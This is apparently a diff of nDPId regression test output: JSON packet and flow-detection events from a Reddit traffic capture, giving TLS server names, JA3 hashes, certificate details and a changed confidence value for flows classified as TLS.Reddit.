00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server 
CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} 
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} 
-01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} 